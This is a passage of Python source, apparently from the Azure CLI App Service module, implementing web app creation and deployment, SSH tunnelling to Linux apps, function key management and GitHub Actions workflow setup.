loc=loc,
sku=sku,
create_rg=_create_new_rg,
resource_group_name=rg_name,
plan=plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, loc)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
# we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are
# updated we update those
try:
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=loc)
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code == 409: # catch 409 conflict when trying to create existing ASP in diff location
try:
response_content = json.loads(ex.response._content.decode('utf-8')) # pylint: disable=protected-access
except Exception: # pylint: disable=broad-except
raise CLIInternalError(ex)
raise UnclassifiedUserFault(response_content['error']['message'])
raise AzureResponseError(ex)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if not html else None,
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
else: # for existing app if we might need to update the stack runtime settings
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
match = helper.resolve(runtime_version)
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
if match and site_config.linux_fx_version != match['configs']['linux_fx_version']:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, match['configs']['linux_fx_version'])
update_site_configs(cmd, rg_name, name, linux_fx_version=match['configs']['linux_fx_version'])
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif not match:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif os_name.lower() == 'windows':
# may need to update stack runtime settings. For node its site_config.app_settings, otherwise site_config
if match:
_update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
def _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version):
update_needed = False
if 'node' in runtime_version:
settings = []
for k, v in match['configs'].items():
for app_setting in site_config.app_settings:
if app_setting.name == k and app_setting.value != v:
update_needed = True
settings.append('%s=%s', k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_app_settings(cmd, rg_name, name, settings=settings, slot=None, slot_settings=None)
else:
for k, v in match['configs'].items():
if getattr(site_config, k, None) != v:
update_needed = True
setattr(site_config, k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_site_configs(cmd,
rg_name,
name,
net_framework_version=site_config.net_framework_version,
php_version=site_config.php_version,
python_version=site_config.python_version,
java_version=site_config.java_version,
java_container=site_config.java_container,
java_container_version=site_config.java_container_version)
current_stack = get_current_stack_from_runtime(runtime_version)
_update_webapp_current_stack_property_if_needed(cmd, rg_name, name, current_stack)
if update_needed:
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
def _update_webapp_current_stack_property_if_needed(cmd, resource_group, name, current_stack):
if not current_stack:
return
# portal uses this current_stack value to display correct runtime for windows webapps
client = web_client_factory(cmd.cli_ctx)
app_metadata = client.web_apps.list_metadata(resource_group, name)
if 'CURRENT_STACK' not in app_metadata.properties or app_metadata.properties["CURRENT_STACK"] != current_stack:
app_metadata.properties["CURRENT_STACK"] = current_stack
client.web_apps.update_metadata(resource_group, name, metadata=app_metadata)
def _ping_scm_site(cmd, resource_group, name, instance=None):
from azure.cli.core.util import should_disable_connection_verify
# wake up kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
cookies = {}
if instance is not None:
cookies['ARRAffinity'] = instance
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(),
cookies=cookies)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
# Validate that we have a known instance (case-sensitive)
if instance is not None:
instances = list_instances(cmd, resource_group_name, name, slot=slot)
instance_names = set(i.name for i in instances)
if instance not in instance_names:
if slot is not None:
raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
_ping_scm_site(cmd, resource_group_name, name, instance=instance)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.is_alive() and t.is_alive():
time.sleep(5)
def perform_onedeploy(cmd,
resource_group_name,
name,
src_path=None,
src_url=None,
target_path=None,
artifact_type=None,
is_async=None,
restart=None,
clean=None,
ignore_stack=None,
timeout=None,
slot=None):
params = OneDeployParams()
params.cmd = cmd
params.resource_group_name = resource_group_name
params.webapp_name = name
params.src_path = src_path
params.src_url = src_url
params.target_path = target_path
params.artifact_type = artifact_type
params.is_async_deployment = is_async
params.should_restart = restart
params.is_clean_deployment = clean
params.should_ignore_stack = ignore_stack
params.timeout = timeout
params.slot = slot
return _perform_onedeploy_internal(params)
# Class for OneDeploy parameters
# pylint: disable=too-many-instance-attributes,too-few-public-methods
class OneDeployParams:
def __init__(self):
self.cmd = None
self.resource_group_name = None
self.webapp_name = None
self.src_path = None
self.src_url = None
self.artifact_type = None
self.is_async_deployment = None
self.target_path = None
self.should_restart = None
self.is_clean_deployment = None
self.should_ignore_stack = None
self.timeout = None
self.slot = None
# pylint: enable=too-many-instance-attributes,too-few-public-methods
def _build_onedeploy_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
deploy_url = scm_url + '/api/publish?type=' + params.artifact_type
if params.is_async_deployment is not None:
deploy_url = deploy_url + '&async=' + str(params.is_async_deployment)
if params.should_restart is not None:
deploy_url = deploy_url + '&restart=' + str(params.should_restart)
if params.is_clean_deployment is not None:
deploy_url = deploy_url + '&clean=' + str(params.is_clean_deployment)
if params.should_ignore_stack is not None:
deploy_url = deploy_url + '&ignorestack=' + str(params.should_ignore_stack)
if params.target_path is not None:
deploy_url = deploy_url + '&path=' + params.target_path
return deploy_url
def _get_onedeploy_status_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
return scm_url + '/api/deployments/latest'
def _get_basic_headers(params):
import urllib3
user_name, password = _get_site_credential(params.cmd.cli_ctx, params.resource_group_name,
params.webapp_name, params.slot)
if params.src_path:
content_type = 'application/octet-stream'
elif params.src_url:
content_type = 'application/json'
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
headers['Content-Type'] = content_type
return headers
def _get_onedeploy_request_body(params):
import os
if params.src_path:
logger.info('Deploying from local path: %s', params.src_path)
try:
with open(os.path.realpath(os.path.expanduser(params.src_path)), 'rb') as fs:
body = fs.read()
except Exception as e: # pylint: disable=broad-except
raise CLIError("Either '{}' is not a valid local file path or you do not have permissions to access it"
.format(params.src_path)) from e
elif params.src_url:
logger.info('Deploying from URL: %s', params.src_url)
body = json.dumps({
"packageUri": params.src_url
})
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
return body
def _update_artifact_type(params):
import ntpath
if params.artifact_type is not None:
return
# Interpret deployment type from the file extension if the type parameter is not passed
file_name = ntpath.basename(params.src_path)
file_extension = file_name.split(".", 1)[1]
if file_extension in ('war', 'jar', 'ear', 'zip'):
params.artifact_type = file_extension
elif file_extension in ('sh', 'bat'):
params.artifact_type = 'startup'
else:
params.artifact_type = 'static'
logger.warning("Deployment type: %s. To override deloyment type, please specify the --type parameter. "
"Possible values: war, jar, ear, zip, startup, script, static", params.artifact_type)
def _make_onedeploy_request(params):
import requests
from azure.cli.core.util import (
should_disable_connection_verify,
)
# Build the request body, headers, API URL and status URL
body = _get_onedeploy_request_body(params)
headers = _get_basic_headers(params)
deploy_url = _build_onedeploy_url(params)
deployment_status_url = _get_onedeploy_status_url(params)
logger.info("Deployment API: %s", deploy_url)
response = requests.post(deploy_url, data=body, headers=headers, verify=not should_disable_connection_verify())
# For debugging purposes only, you can change the async deployment into a sync deployment by polling the API status
# For that, set poll_async_deployment_for_debugging=True
poll_async_deployment_for_debugging = True
# check the status of async deployment
if response.status_code == 202 or response.status_code == 200:
response_body = None
if poll_async_deployment_for_debugging:
logger.info('Polling the status of async deployment')
response_body = _check_zip_deployment_status(params.cmd, params.resource_group_name, params.webapp_name,
deployment_status_url, headers, params.timeout)
logger.info('Async deployment complete. Server response: %s', response_body)
return response_body
# API not available yet!
if response.status_code == 404:
raise CLIError("This API isn't available in this environment yet!")
# check if there's an ongoing process
if response.status_code == 409:
raise CLIError("Another deployment is in progress. You can track the ongoing deployment at {}"
.format(deployment_status_url))
# check if an error occured during deployment
if response.status_code:
raise CLIError("An error occured during deployment. Status Code: {}, Details: {}"
.format(response.status_code, response.text))
# OneDeploy
def _perform_onedeploy_internal(params):
# Update artifact type, if required
_update_artifact_type(params)
# Now make the OneDeploy API call
logger.info("Initiating deployment")
response = _make_onedeploy_request(params)
logger.info("Deployment has completed successfully")
return response
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError('SSH timeout, your app must be running before'
' it can accept SSH connections. '
'Use `az webapp log tail` to review the app startup logs.')
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
c.run('cat /etc/motd', pty=True)
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise ValidationError("Only Linux App Service Plans supported, found a Windows App Service Plan")
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
open_page_in_browser(scm_url + '/webssh/host')
else:
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise ValidationError('Remote debugging is enabled, please disable')
create_tunnel_and_session(
cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def create_devops_pipeline(
cmd,
functionapp_name=None,
organization_name=None,
project_name=None,
repository_name=None,
overwrite_yaml=None,
allow_force_push=None,
github_pat=None,
github_repository=None
):
from .azure_devops_build_interactive import AzureDevopsBuildInteractive
azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
organization_name, project_name, repository_name,
overwrite_yaml, allow_force_push,
github_pat, github_repository)
return azure_devops_build_interactive.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _validate_asp_sku(app_service_environment, sku):
# Isolated SKU is supported only for ASE
if sku.upper() in ['I1', 'I2', 'I3', 'I1V2', 'I2V2', 'I3V2']:
if not app_service_environment:
raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
else:
if app_service_environment:
raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and (hostname_binding.host_name_type == 'Verified' or
hostname_binding.host_name_type == 'Managed'):
verified_hostname_found = True
return verified_hostname_found
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
name,
key_type,
key_name,
slot, key=key_info)
return client.web_apps.create_or_update_host_secret(resource_group_name,
name,
key_type,
key_name, key=key_info)
def list_host_keys(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_host_keys_slot(resource_group_name, name, slot)
return client.web_apps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot)
return client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name)
def show_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.get_function(resource_group_name, name, function_name)
if result is None:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def delete_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.delete_function(resource_group_name, name, function_name)
return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
key_info)
return client.web_apps.create_or_update_function_secret(resource_group_name,
name,
function_name,
key_name,
key_info)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
return client.web_apps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_function_secret_slot(resource_group_name, name, function_name, key_name, slot)
return client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name)
def add_github_actions(cmd, resource_group, name, repo, runtime=None, token=None, slot=None, # pylint: disable=too-many-statements,too-many-branches
branch='master', login_with_github=False, force=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
if site_availability.name_available or (not site_availability.name_available and
site_availability.reason == 'Invalid'):
raise ResourceNotFoundError(
"The Resource 'Microsoft.Web/sites/%s' under resource group '%s' "
"was not found." % (name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise ResourceNotFoundError(
"Unable to retrieve details of the existing app %s. Please check that the app is a part of "
"the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise ResourceNotFoundError("The webapp %s exists in ResourceGroup %s and does not match the "
"value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
parsed_plan_id = parse_resource_id(app_details.server_farm_id)
client = web_client_factory(cmd.cli_ctx)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
is_linux = plan_info.reserved
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
if repo.strip()[-1] == '/':
repo = repo.strip()[:-1]
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Verify runtime
app_runtime_info = _get_app_runtime_info(
cmd=cmd, resource_group=resource_group, name=name, slot=slot, is_linux=is_linux)
app_runtime_string = None
if(app_runtime_info and app_runtime_info['display_name']):
app_runtime_string = app_runtime_info['display_name']
github_actions_version = None
if (app_runtime_info and app_runtime_info['github_actions_version']):
github_actions_version = app_runtime_info['github_actions_version']
if runtime and app_runtime_string:
if app_runtime_string.lower() != runtime.lower():
logger.warning('The app runtime: {app_runtime_string} does not match the runtime specified: '
'{runtime}. Using the specified runtime {runtime}.')
app_runtime_string = runtime
elif runtime:
app_runtime_string = runtime
if not app_runtime_string:
raise CLIError('Could not detect runtime. Please specify using the --runtime flag.')
if not _runtime_supports_github_actions(runtime_string=app_runtime_string, is_linux=is_linux):
raise CLIError("Runtime %s is not supported for GitHub Actions deployments." % app_runtime_string)
# Get workflow template
logger.warning('Getting workflow template using runtime: %s', app_runtime_string)
workflow_template = _get_workflow_template(github=g, runtime_string=app_runtime_string, is_linux=is_linux)
# Fill workflow template
guid = str(uuid.uuid4()).replace('-', '')
publish_profile_name = "AzureAppService_PublishProfile_{}".format(guid)
logger.warning(
'Filling workflow template with name: %s, branch: %s, version: %s, slot: %s',
name, branch, github_actions_version, slot if slot else 'production')
completed_workflow_file = _fill_workflow_template(content=workflow_template.decoded_content.decode(), name=name,
branch=branch, slot=slot, publish_profile=publish_profile_name,
version=github_actions_version)
completed_workflow_file = completed_workflow_file.encode()
# Check if workflow exists in repo, otherwise push
if slot:
file_name = "{}_{}({}).yml".format(branch.replace('/', '-'), name.lower(), slot)
else:
file_name = "{}_{}.yml".format(branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "/{}/{}".format(dir_path, file_name)
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
if existing_publish_profile_name:
completed_workflow_file = completed_workflow_file.decode()
completed_workflow_file = completed_workflow_file.replace(
publish_profile_name, existing_publish_profile_name)
completed_workflow_file = completed_workflow_file.encode()
publish_profile_name = existing_publish_profile_name
logger.warning("Existing workflow file found")
if force:
logger.warning("Replacing the existing workflow file")
github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha, branch=branch)
else:
option = prompt_y_n('Replace existing workflow file?')
if option:
logger.warning("Replacing the existing workflow file")
github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha,
branch=branch)
else:
logger.warning("Use the existing workflow file")
if existing_publish_profile_name:
publish_profile_name = existing_publish_profile_name
except UnknownObjectException:
logger.warning("Creating new workflow file: %s", file_path)
github_repo.create_file(path=file_path, message="Create workflow using Azure CLI",
content=completed_workflow_file, branch=branch)
# Add publish profile to GitHub
logger.warning('Adding publish profile to GitHub')
_add_publish_profile_to_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo,
token=token, github_actions_secret_name=publish_profile_name,
slot=slot)
# Set site source control properties
_update_site_source_control_properties_for_gh_action(
cmd=cmd, resource_group=resource_group, name=name, token=token, repo=repo, branch=branch, slot=slot)
github_actions_url = "https://github.com/{}/actions".format(repo)
return github_actions_url
def remove_github_actions(cmd, resource_group, name, repo, token=None, slot=None, # pylint: disable=too-many-statements
branch='master', login_with_github=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
if site_availability.name_available or (not site_availability.name_available and
site_availability.reason == 'Invalid'):
raise CLIError("The Resource 'Microsoft.Web/sites/%s' under resource group '%s' was not found." %
(name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app %s. "
"Please check that the app is a part of the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise CLIError("The webapp %s exists in ResourceGroup %s and does not match "
"the value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
if repo.strip()[-1] == '/':
repo = repo.strip()[:-1]
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Check if workflow exists in repo and remove
file_name = "{}_{}({}).yml".format(
branch.replace('/', '-'), name.lower(), slot) if slot else "{}_{}.yml".format(
branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "/{}/{}".format(dir_path, file_name)
existing_publish_profile_name = None
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
logger.warning("Removing the existing workflow file")
github_repo.delete_file(path=file_path, message="Removing workflow file, disconnecting github actions",
sha=existing_workflow_file.sha, branch=branch)
except UnknownObjectException as e:
error_msg = "Error when removing workflow file."
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Remove publish profile from GitHub
if existing_publish_profile_name:
logger.warning('Removing publish profile from GitHub')
_remove_publish_profile_from_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo, token=token,
github_actions_secret_name=existing_publish_profile_name, slot=slot)
# Remove site source control properties
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
return "Disconnected successfully."
def _get_publish_profile_from_workflow_file(workflow_file):
import re
publish_profile = None
regex = re.search(r'publish-profile: \$\{\{ secrets\..*?\}\}', workflow_file)
if regex:
publish_profile = regex.group()
publish_profile = publish_profile.replace('publish-profile: ${{ secrets.', '')
publish_profile = publish_profile[:-2]
if publish_profile:
return publish_profile.strip()
return None
def _update_site_source_control_properties_for_gh_action(cmd, resource_group, name, token, repo=None,
branch="master", slot=None):
if repo:
repo_url = 'https://github.com/' + repo
else:
repo_url = None
site_source_control = show_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
if site_source_control:
if not repo_url:
repo_url = site_source_control.repo_url
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
config_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
repo_url=repo_url,
repository_type='github',
github_action=True,
branch=branch,
git_token=token,
slot=slot)
def _get_workflow_template(github, runtime_string, is_linux):
from github import GithubException
from github.GithubException import BadCredentialsException
file_contents = None
template_repo_path = 'Azure/actions-workflow-templates'
template_file_path = _get_template_file_path(runtime_string=runtime_string, is_linux=is_linux)
try:
template_repo = github.get_repo(template_repo_path)
file_contents = template_repo.get_contents(template_file_path)
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when retrieving workflow template"
if e.data and e.data['message']:
error_msg += ": {}".format(e.data['message'])
raise CLIError(error_msg)
return file_contents
def _fill_workflow_template(content, name, branch, slot, publish_profile, version):
if not slot:
slot = 'production'
content = content.replace('${web-app-name}', name)
content = content.replace('${branch}', branch)
content = content.replace('${slot-name}', slot)
content = content.replace('${azure-webapp-publish-profile-name}', publish_profile)
content = content.replace('${AZURE_WEBAPP_PUBLISH_PROFILE}', publish_profile)
content = content.replace('${dotnet-core-version}', version)
content = content.replace('${java-version}', version)
content = content.replace('${node-version}', version)
content = content.replace('${python-version}', version)
return content
def _get_template_file_path(runtime_string, is_linux):
if not runtime_string:
raise CLIError('Unable to retrieve workflow template')
runtime_string = runtime_string.lower()
runtime_stack = runtime_string.split('|')[0]
template_file_path = None
if is_linux:
template_file_path = LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
else:
# Handle java naming
if runtime_stack == 'java':
java_container_split = runtime_string.split('|')
if java_container_split and len(java_container_split) >= 2:
if java_container_split[2] == 'tomcat':
runtime_stack = 'tomcat'
elif java_container_split[2] == 'java se':
